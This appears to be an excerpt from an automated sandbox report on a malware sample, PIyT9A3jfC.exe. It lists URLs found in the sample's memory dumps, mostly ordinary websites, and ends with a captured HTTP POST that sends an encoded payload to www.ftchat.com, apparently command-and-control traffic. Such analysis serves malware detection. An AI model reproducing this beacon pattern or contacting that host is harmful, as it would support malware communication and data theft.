                  Source: PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013F3000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/wp-json/wp/v2/pages/1009
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pcgrate.com/xmlrpc.php?rsd
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.807475792.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.602486306.0000000007B00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.pwd.org/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702274857.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.585457816.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.704904203.00000000060C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.704473674.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.quadlock.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.sbc.si/o-sbc/organizacija
                  Source: PIyT9A3jfC.exe, 00000001.00000003.807475792.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687999536.000000000770E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.spanesi.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687770203.00000000013C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.spanesi.com//
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.stajerskagz.si/o-sgz-2/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.807475792.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.676941396.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687770203.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.stajum.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.stnic.co.uk/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.tecos.si/index.php/sl/o-podjetju/predstavitev
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/channel/UCvpY2zO1GRvxBdgkg7BUm-A
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zdruzenje-manager.si/sl/o-zdruzenju/o-zdruzenju/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zds.si/sl/o-zds/predstavitev/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.676941396.0000000001423000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.692272260.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000003.00000003.669232158.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ftchat.comCache-Control: no-cacheData Raw: 68 48 4e 79 78 48 31 43 37 41 68 65 55 57 63 33 4e 43 45 68 55 62 62 37 68 4e 6d 72 34 34 32 6d 41 57 50 65 75 6d 6c 4c 59 51 7a 76 49 47 45 74 72 74 4f 54 50 35 6d 53 77 66 38 33 2f 4d 35 58 73 6e 6c 31 37 67 6e 76 48 4b 7a 6c 54 67 53 78 6a 6d 38 49 70 4b 4b 6c 72 48 65 79 72 54 58 71 6c 36 52 44 59 77 61 74 75 37 72 36 74 55 6e 75 45 54 4f 37 53 4e 56 32 2f 7a 65 4c 51 35 64 6b 63 74 79 70 74 4f 62 39 57 48 70 44 7a 72 78 6f 6e 4e 79 73 33 79 30 4e 4e 4f 47 53 35 71 2f 39 49 39 57 4d 62 39 6e 45 6a 30 63 71 6c 47 4d 54 70 41 4b 6f 6e 63 5a 37 70 42 53 74 37 51 4e 6a 56 30 71 39 43 54 69 63 68 4e 4d 74 70 4b 41 31 39 71 56 62 36 43 68 64 4f 34 34 61 66 77 65 35 41 32 31 39 31 71 64 6d 57 5a 6c 61 35 62 64 5a 39 6b 70 70 6a 46 32 75 6a 72 59 37 2b 4e 44 4b 69 63 41 6c 4a 37 74 45 72 51 51 32 2f 6e 7a 6b 6c 2b 32 59 30 72 62 55 5a 63 62 38 43 68 4a 55 48 61 68 39 4c 32 6a 44 68 76 47 4c 66 30 59 52 75 59 56 4f 6f 73 32 73 61 53 64 44 61 7a 44 68 57 64 66 73 79 61 32 49 52 32 4e 2b 39 33 6f 39 4f 4a 53 57 71 68 46 70 6c 46 48 43 47 33 73 57 77 62 62 4d 4d 37 59 39 6e 57 6c 31 72 64 47 59 48 79 6b 65 43 31 49 6f 69 5a 69 49 62 31 57 30 4f 47 75 6e 44 59 78 52 68 32 67 6a 65 4c 6d 65 47 2f 35 72 6e 62 41 33 65 31 6e 67 34 6a 79 49 33 79 73 49 70 70 63 63 4f 53 62 54 59 47 34 45 68 73 4f 38 4f 64 61 5a 2f 49 58 53 70 58 57 33 31 42 4d 6d 75 4e 6f 41 6b 2f 6c 7a 35 2b 58 76 53 5a 67 6b 74 4b 48 47 6b 49 36 6a 66 58 35 50 4f 31 35 63 47 7a 49 62 48 6f 7a 47 48 2b 34 58 64 4e 39 6d 66 4b 37 49 44 6d 4a 68 2b 30 63 35 59 4b 38 6b 58 55 42 50 54 4f 34 73 51 44 37 6c 55 34 30 7a 61 56 64 70 79 70 51 68 75 4f 4c 4a 51 52 42 50 7a 54 77 33 79 37 6b 7a 48 4b 37 64 4a 31 37 6b 4d 50 6a 30 6f 31 73 53 Data Ascii: 